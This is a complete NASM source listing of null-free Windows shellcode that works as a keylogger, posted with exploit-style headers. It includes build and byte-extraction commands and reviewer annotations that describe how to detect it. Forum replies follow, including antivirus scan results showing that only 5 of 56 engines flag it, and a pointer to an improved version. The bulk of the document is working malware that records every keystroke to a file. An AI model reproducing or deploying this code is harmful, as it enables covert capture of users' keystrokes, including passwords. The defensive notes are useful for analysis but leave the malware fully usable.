; Exploit Title: All windows null free shellcode - primitave keylogger to file - 431 (0x01AF) bytes
; Date: Sat Apr 23 18:34:25 GMT 2016
; Exploit Author: Fugu
; Vendor Homepage: www.microsoft.com
; Version: all afaik
; Tested on: Win7 (im guessing it will work on others)
; Note: it will write to "log.bin" in the same directory as the exe, iff that DIR is writable.
; it is kinda spammy to the logfile, and will grow quickly. keystrokes are saved in format:
; "Virtual-Key Codes", from msdn.microsoft.com website
; nasm -f win32 test.asm && i686-w64-mingw32-ld -o test.exe test.obj
; dd if=test.exe bs=1 status=none skip=$((0x200)) count=$((0x3AE-0x200+1)) | xxd -ps | tr -d '\n'; echo
;
; Analyst notes (added on review):
;   Syntax/target: NASM, Intel syntax, 32-bit Windows user mode (fs:[0x30] PEB
;   access, stdcall Win32 APIs). Each instruction keeps the author's original
;   "offset  bytes" comment; the notes after it are the reviewer's.
;   Stack discipline: every API reached here is stdcall, so the callee removes
;   its own arguments; the `lea esp,[esp+N]` after each call only discards the
;   function-name string that was built on the stack. `lea` rather than `add`
;   keeps the encoding free of NUL bytes and leaves flags untouched.
;   Resolved function pointers and the file handle stay on the stack and are
;   reached via [esp+N] (stack map given at `loc_172h`).
;   Detection/forensics (all visible in the listing below): no import table —
;   kernel32 is located by walking the PEB loader list and GetProcAddress by
;   parsing the export directory by hand; "log.bin" is opened with a relative
;   path (so in the process's current directory) with append access; GetKeyState
;   is polled for VK 0x01..0xFF in a tight loop with no sleep, and one raw VK
;   byte is appended per observed key-down. A process spinning on GetKeyState
;   plus a steadily growing "log.bin" are the observable artefacts; none of the
;   API return values (LoadLibraryA, CreateFileA, WriteFile) are checked.

section .bss
section .data
section .text
global _start
_start:
        cld                                     ; 00000000 FC          lodsb/lodsd below must walk forward
        xor     edx,edx                         ; 00000001 31D2
        mov     dl,0x30                         ; 00000003 B230        edx = 0x30 without a NUL-bearing immediate
        push    dword [fs:edx]                  ; 00000005 64FF32      fs:[0x30] = PEB
        pop     edx                             ; 00000008 5A
        mov     edx,[edx+0xc]                   ; 00000009 8B520C      PEB->Ldr
        mov     edx,[edx+0x14]                  ; 0000000C 8B5214      Ldr->InMemoryOrderModuleList.Flink
loc_fh:                                         ; for each loaded module entry in edx:
        mov     esi,[edx+0x28]                  ; 0000000F 8B7228      esi = BaseDllName.Buffer (UTF-16)
        xor     eax,eax                         ; 00000012 31C0
        mov     ecx,eax                         ; 00000014 89C1
        mov     cl,0x3                          ; 00000016 B103        3 rounds of 2 bytes + 1 = first 4 characters
loc_18h:
        lodsb                                   ; 00000018 AC          low byte of one UTF-16 char
        rol     eax,byte 0x8                    ; 00000019 C1C008      shift it up; eax accumulates the chars big-endian
        lodsb                                   ; 0000001C AC          consume the (zero) high byte; overwritten next round
        loop    loc_18h                         ; 0000001D E2F9
        lodsb                                   ; 0000001F AC          fourth character lands in al
        cmp     eax,0x4b45524e                  ; 00000020 3D4E52454B  "KERN" (KERNEL32.DLL)
        jz      loc_2ch                         ; 00000025 7405
        cmp     eax,0x6b65726e                  ; 00000027 3D6E72656B  "kern" (kernel32.dll); ZF feeds the jnz below
loc_2ch:
        mov     ebx,[edx+0x10]                  ; 0000002C 8B5A10      ebx = DllBase of this entry
        mov     edx,[edx]                       ; 0000002F 8B12        edx = next entry (mov preserves ZF)
        jnz     loc_fh                          ; 00000031 75DC        not kernel32: keep walking
        mov     edx,[ebx+0x3c]                  ; 00000033 8B533C      e_lfanew
        add     edx,ebx                         ; 00000036 01DA        edx = IMAGE_NT_HEADERS
        push    dword [edx+0x34]                ; 00000038 FF7234      OptionalHeader.ImageBase — pushed but never read again below (looks like a leftover)
        mov     edx,[edx+0x78]                  ; 0000003B 8B5278      export directory RVA
        add     edx,ebx                         ; 0000003E 01DA        edx = IMAGE_EXPORT_DIRECTORY
        mov     esi,[edx+0x20]                  ; 00000040 8B7220      AddressOfNames RVA
        add     esi,ebx                         ; 00000043 01DE
;GetProcAddress
        xor     ecx,ecx                         ; 00000045 31C9        ecx = name index (pre-incremented, fixed up by dec)
loc_47h:
        inc     ecx                             ; 00000047 41
        lodsd                                   ; 00000048 AD          eax = next name RVA
        add     eax,ebx                         ; 00000049 01D8
        cmp     dword [eax],0x50746547          ; 0000004B 813847657450  "GetP"
        jnz     loc_47h                         ; 00000051 75F4
        cmp     dword [eax+0x4],0x41636f72      ; 00000053 817804726F6341  "rocA"
        jnz     loc_47h                         ; 0000005A 75EB
        cmp     dword [eax+0x8],0x65726464      ; 0000005C 81780864647265  "ddre"
        jnz     loc_47h                         ; 00000063 75E2        12-byte prefix match only; relies on no earlier export sharing it
        dec     ecx                             ; 00000065 49          back to the 0-based index
        mov     esi,[edx+0x24]                  ; 00000066 8B7224      AddressOfNameOrdinals RVA
        add     esi,ebx                         ; 00000069 01DE
        mov     cx,[esi+ecx*2]                  ; 0000006B 668B0C4E    cx = ordinal (upper half of ecx is 0 while index < 0x10000)
        mov     esi,[edx+0x1c]                  ; 0000006F 8B721C      AddressOfFunctions RVA
        add     esi,ebx                         ; 00000072 01DE
        mov     edx,[esi+ecx*4]                 ; 00000074 8B148E      function RVA
        add     edx,ebx                         ; 00000077 01DA
        mov     edi,edx                         ; 00000079 89D7        edi = GetProcAddress, used for every lookup below
        push    edx                             ; 0000007B 52          keep a copy on the stack
;GetModuleHandleA
        xor     eax,eax                         ; 0000007C 31C0
        push    eax                             ; 0000007E 50          NUL terminator for the name pushed next
        push    dword 0x41656c64                ; 0000007F 68646C6541  "dleA"
        push    dword 0x6e614865                ; 00000084 686548616E  "eHan"
        push    dword 0x6c75646f                ; 00000089 686F64756C  "odul"
        push    dword 0x4d746547                ; 0000008E 684765744D  "GetM" -> "GetModuleHandleA\0"
        push    esp                             ; 00000093 54          lpProcName
        push    ebx                             ; 00000094 53          hModule = kernel32
        call    edi                             ; 00000095 FFD7        GetProcAddress(kernel32, "GetModuleHandleA")
        lea     esp,[esp+0x14]                  ; 00000097 8D642414    drop the 5-dword name
        push    eax                             ; 0000009B 50          [stack] GetModuleHandleA
;GetModuleHandleA("USER32.DLL")
        push    dword 0x88014c4c                ; 0000009C 684C4C0188  "LL\x01\x88"
        dec     byte [esp+0x2]                  ; 000000A1 FE4C2402    0x01 -> 0x00: terminator without a NUL in the code
        push    dword 0x442e3233                ; 000000A5 6833322E44  "32.D"
        push    dword 0x52455355                ; 000000AA 6855534552  "USER" -> "USER32.DLL\0"
        push    esp                             ; 000000AF 54          lpModuleName
        call    eax                             ; 000000B0 FFD0        GetModuleHandleA("USER32.DLL")
        xor     edx,edx                         ; 000000B2 31D2
        cmp     eax,edx                         ; 000000B4 39D0        already loaded?
        jnz     loc_f0h                         ; 000000B6 7538        yes: eax = hUser32 (the 3-dword name is left on the stack)
        lea     esp,[esp+0xc]                   ; 000000B8 8D64240C    drop "USER32.DLL"
;LoadLibraryA
        push    edx                             ; 000000BC 52          edx == 0: terminator
        push    dword 0x41797261                ; 000000BD 6861727941  "aryA"
        push    dword 0x7262694c                ; 000000C2 684C696272  "Libr"
        push    dword 0x64616f4c                ; 000000C7 684C6F6164  "Load" -> "LoadLibraryA\0"
        push    esp                             ; 000000CC 54
        push    ebx                             ; 000000CD 53
        call    edi                             ; 000000CE FFD7        GetProcAddress(kernel32, "LoadLibraryA")
        lea     esp,[esp+0x10]                  ; 000000D0 8D642410    drop the 4-dword name
        push    eax                             ; 000000D4 50          [stack] LoadLibraryA
;LoadLibraryA("USER32.DLL")
        push    dword 0x77014c4c                ; 000000D5 684C4C0177  "LL\x01w"
        dec     byte [esp+0x2]                  ; 000000DA FE4C2402    -> "LL\0"
        push    dword 0x442e3233                ; 000000DE 6833322E44
        push    dword 0x52455355                ; 000000E3 6855534552
        push    esp                             ; 000000E8 54
        call    eax                             ; 000000E9 FFD0        LoadLibraryA("USER32.DLL")
        lea     esp,[esp+0xc]                   ; 000000EB 8D64240C
        push    eax                             ; 000000EF 50          [stack] hUser32 — not checked for NULL
;GetKeyState
loc_f0h:
        mov     edx,eax                         ; 000000F0 89C2        edx = hUser32 (either path)
        push    dword 0x1657461                 ; 000000F2 6861746501  "ate\x01"
        dec     byte [esp+0x3]                  ; 000000F7 FE4C2403    -> "ate\0"
        push    dword 0x74537965                ; 000000FB 6865795374  "eySt"
        push    dword 0x4b746547                ; 00000100 684765744B  "GetK" -> "GetKeyState\0"
        push    esp                             ; 00000105 54
        push    edx                             ; 00000106 52          hModule = user32
        call    edi                             ; 00000107 FFD7        GetProcAddress(user32, "GetKeyState")
        lea     esp,[esp+0xc]                   ; 00000109 8D64240C
        push    eax                             ; 0000010D 50          [stack] GetKeyState
;WriteFile
        push    dword 0x55010165                ; 0000010E 6865010155  "e\x01\x01U"
        dec     byte [esp+0x1]                  ; 00000113 FE4C2401    -> "e\0"
        push    dword 0x6c694665                ; 00000117 686546696C  "eFil"
        push    dword 0x74697257                ; 0000011C 6857726974  "Writ" -> "WriteFile\0"
        push    esp                             ; 00000121 54
        push    ebx                             ; 00000122 53
        call    edi                             ; 00000123 FFD7        GetProcAddress(kernel32, "WriteFile")
        lea     esp,[esp+0xc]                   ; 00000125 8D64240C
        push    eax                             ; 00000129 50          [stack] WriteFile
;CreateFileA
        push    dword 0x141656c                 ; 0000012A 686C654101  "leA\x01"
        dec     byte [esp+0x3]                  ; 0000012F FE4C2403    -> "leA\0"
        push    dword 0x69466574                ; 00000133 6874654669  "teFi"
        push    dword 0x61657243                ; 00000138 6843726561  "Crea" -> "CreateFileA\0"
        push    esp                             ; 0000013D 54
        push    ebx                             ; 0000013E 53
        call    edi                             ; 0000013F FFD7        GetProcAddress(kernel32, "CreateFileA")
        lea     esp,[esp+0xc]                   ; 00000141 8D64240C
        push    eax                             ; 00000145 50          [stack] CreateFileA; eax still holds it for the call below
        push    dword 0x16e6962                 ; 00000146 6862696E01  "bin\x01"
        dec     byte [esp+0x3]                  ; 0000014B FE4C2403    -> "bin\0"
        push    dword 0x2e676f6c                ; 0000014F 686C6F672E  "log." -> "log.bin\0" (relative path)
        xor     ecx,ecx                         ; 00000154 31C9
        push    ecx                             ; 00000156 51          hTemplateFile = NULL
        push    ecx                             ; 00000157 51
        add     byte [esp],0x80                 ; 00000158 80042480    dwFlagsAndAttributes = 0x80 (FILE_ATTRIBUTE_NORMAL)
        push    byte +0x4                       ; 0000015C 6A04        dwCreationDisposition = 4 (OPEN_ALWAYS)
        push    ecx                             ; 0000015E 51          lpSecurityAttributes = NULL
        push    byte +0x2                       ; 0000015F 6A02        dwShareMode = 2 (FILE_SHARE_WRITE)
        push    ecx                             ; 00000161 51
        add     byte [esp],0x4                  ; 00000162 80042404    dwDesiredAccess = 4 (FILE_APPEND_DATA)
        lea     ecx,[esp+0x18]                  ; 00000166 8D4C2418    lpFileName -> "log.bin" (above the 6 args just pushed)
        push    ecx                             ; 0000016A 51
        call    eax                             ; 0000016B FFD0        CreateFileA(...); INVALID_HANDLE_VALUE is not checked
        lea     esp,[esp+0x8]                   ; 0000016D 8D642408    drop "log.bin"
        push    eax                             ; 00000171 50          [stack] hFile
;main loop
; Stack map inside the loop, relative to esp right after `push esi`:
;   [esp]      = vk            [esp+0x04] = hFile
;   [esp+0x08] = CreateFileA   [esp+0x0c] = WriteFile   [esp+0x10] = GetKeyState
loc_172h:
        xor     ecx,ecx                         ; 00000172 31C9
        xor     esi,esi                         ; 00000174 31F6        esi = virtual-key code under test
loc_176h:
        mov     cl,0xff                         ; 00000176 B1FF
        mov     eax,esi                         ; 00000178 89F0
        cmp     al,cl                           ; 0000017A 38C8        unsigned compare on the low byte
        jc      loc_180h                        ; 0000017C 7202        vk < 0xff: advance
        xor     esi,esi                         ; 0000017E 31F6        wrap: restart the scan at 0x01
loc_180h:
        inc     esi                             ; 00000180 46          vk runs 0x01..0xff
        push    esi                             ; 00000181 56          nVirtKey
        call    dword [esp+0x10]                ; 00000182 FF542410    GetKeyState(vk); stdcall pops nVirtKey
        mov     edx,esi                         ; 00000186 89F2        edx = vk (eax = key state SHORT)
        xor     ecx,ecx                         ; 00000188 31C9
        mov     cl,0x80                         ; 0000018A B180
        and     eax,ecx                         ; 0000018C 21C8        test bit 7 of the state word
        xor     ecx,ecx                         ; 0000018E 31C9        NOTE(review): the documented "key down" bit is bit 15 of the
        cmp     eax,ecx                         ; 00000190 39C8        returned SHORT; this relies on the low byte being 0x80 when down — confirm
        jz      loc_176h                        ; 00000192 74E2        not down: next vk; no sleep, so the loop spins continuously
        push    edx                             ; 00000194 52          vk, stored as a dword slot (only its low byte is written)
        push    ecx                             ; 00000195 51          lpOverlapped = NULL
        lea     ecx,[esp]                       ; 00000196 8D0C24
        push    ecx                             ; 00000199 51          lpNumberOfBytesWritten -> aliases the lpOverlapped slot (fragile, presumably harmless)
        push    byte +0x1                       ; 0000019A 6A01        nNumberOfBytesToWrite = 1
        lea     ecx,[esp+0xc]                   ; 0000019C 8D4C240C
        push    ecx                             ; 000001A0 51          lpBuffer -> vk
        push    dword [esp+0x14]                ; 000001A1 FF742414    hFile
        call    dword [esp+0x20]                ; 000001A5 FF542420    WriteFile(hFile, &vk, 1, &written, NULL); result not checked
        lea     esp,[esp+0x4]                   ; 000001A9 8D642404    drop the vk slot (stdcall removed the 5 args)
        jmp     short loc_172h                  ; 000001AD EBC3        restart the whole scan after every hit
;the actual shellcode
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
i8igmac Posted April 23, 2016 Noice ^^
fugu Posted April 24, 2016 Thank you!
i8igmac Posted April 27, 2016 can you show virus scan results?
fugu Posted April 27, 2016 can you show virus scan results? SHA256: 525dd24ac394e238404fe08504891bab80168c80fba1e396827a8683b697845c File name: test.exe Detection ratio: 5 / 56 Analysis date: 2016-04-27 04:09:53 UTC ( 1 minute ago ) 0 0 Analysis File detail Additional information Comments Votes Behavioural information Antivirus Result Update Avira (no cloud) TR/Crypt.XPACK.Gen 20160426 NANO-Antivirus Virus.Win32.Gen.ccmw 20160427 Qihoo-360 HEUR/QVM20.1.0000.Malware.Gen 20160427 Sophos Mal/EncPk-ND 20160427 VBA32 Heur.Trojan.Hlux 20160425 ALYac 20160427 AVG 20160427 AVware 20160427 Ad-Aware 20160427 AegisLab 20160426 AhnLab-V3 20160426 Alibaba 20160426 Antiy-AVL 20160427 Arcabit 20160427 Avast 20160427 Baidu 20160426 Baidu-International 20160426 BitDefender 20160427 Bkav 20160427 CAT-QuickHeal 20160427 CMC 20160425 ClamAV 20160426 Comodo 20160426 Cyren 20160427 DrWeb 20160427 ESET-NOD32 20160427 Emsisoft 20160427 F-Prot 20160427 F-Secure 20160427 Fortinet 20160425 GData 20160427 Ikarus 20160426 Jiangmin 20160427 K7AntiVirus 20160426 K7GW 20160427 Kaspersky 20160427 Kingsoft 20160427 Malwarebytes 20160427 McAfee 20160427 McAfee-GW-Edition 20160427 eScan 20160427 Microsoft 20160427 Panda 20160426 Rising 20160427 SUPERAntiSpyware 20160427 Symantec 20160427 Tencent 20160427 TheHacker 20160426 TrendMicro 20160427 TrendMicro-HouseCall 20160427 VIPRE 20160427 ViRobot 20160427 Yandex 20160426 Zillya 20160426 Zoner 20160427 nProtect 20160426
AllCNICoFounder Posted June 9, 2016 Thank you so much for this <:
fugu Posted June 11, 2016 On 6/9/2016 at 11:22 AM, AllCNICoFounder said: Thank you so much for this <: No problem:) There is a slightly better version of this at the Exploit DB www.exploit-db.com under shellcodes, which doesn't spam the log file or bog down the CPU.